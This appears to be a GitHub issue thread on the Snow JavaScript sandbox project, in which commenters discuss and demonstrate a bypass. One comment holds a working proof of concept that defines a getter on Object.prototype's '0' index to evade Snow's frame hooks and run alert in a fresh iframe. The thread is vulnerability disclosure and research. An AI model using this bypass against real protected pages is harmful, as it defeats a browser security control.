Comments (6)
Note that the prototype of an arguments object is just the primordial Object.prototype (cf. CreateUnmappedArgumentsObject and CreateMappedArgumentsObject).
from snow.
I think an important conclusion here is that in contrast to the title of this issue, the exploit is not about the arguments
object specifically, but it's about Snow not being careful when accessing indexed properties.
as proof, in the exploit poc, arguments.__proto__
can be replaced with Object.prototype
/Array.prototype
and it'll still work
from snow.
nice find @benjamingr
from snow.
Thanks, cool project! I warmly recommend figuring out how to run static analysis to find these (which would be a cool project on its own) :)
- For JavaScript I would pursue something similar to what @erights worked on here https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/37199.pdf
- For the DOM I'd pursue something similar autogenerated from the WebIDL of the spec so you can automatically keep up to date with the changing standard
Otherwise it's "whack a mole" with "did you find all the places JS is surprisingly dynamic in your code and all the places the DOM allows insertion".
from snow.
Conclusion: It's also doable in strict mode
(function() {
"use strict"
Object.defineProperty(Object.prototype, '0', {
get() {
const whereAmI = (new Error).stack;
if (whereAmI.includes('hook')) {
this.length = 0; // empty frames array
return undefined;
}
return this.payload;
},
set(value) {
// debugger;
this.length = 1;
this.payload = value;
}
});
})();
const fr = document.createElement('iframe');
document.body.appendChild(fr);
fr.contentWindow.alert.call(null, 'pwn');
from snow.
solution in progress
EDIT:
#15 is better
from snow.
Related Issues (20)
- Hooks for "addEventListener" and "removeEventListener" are wrongly depending on "this" HOT 1
- Bypasses via Blob URIs HOT 6
- Bypass Snow via declarative shadow DOM HOT 3
- Bug in JSON parsing on TikTok caused by Snow HOT 1
- Custom elements are still vulnerable HOT 1
- Firefox tests fail to run document.write calls HOT 2
- Old Snow tests show Snow vulnerability on Firefox HOT 3
- Firefox does not respect addEventListener calls made with EventTarget of a detached realm HOT 1
- Snow can be bypassed with document.open('', '', '') HOT 2
- Snow can be bypassed with window.parent.alert(...) HOT 2
- Snow can be bypassed with postMessage from iframe by accessing event.source and event.currentTarget HOT 3
- Snow can be bypassed with ...data: URI HOT 10
- Snow can be bypassed with frameSet HOT 3
- documentPictureInPicture bypasses snow HOT 6
- Demo has insecure implementation HOT 1
- more javascript uri bypasses with target attr HOT 5
- Clash when snow protected page opens itself
- Open window, than open iframe seems to bypass Snow HOT 1
- Bypass with Range.insertNode HOT 2
- Blob override is not good enough and clashes with whatwg-fetch npm package HOT 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from snow.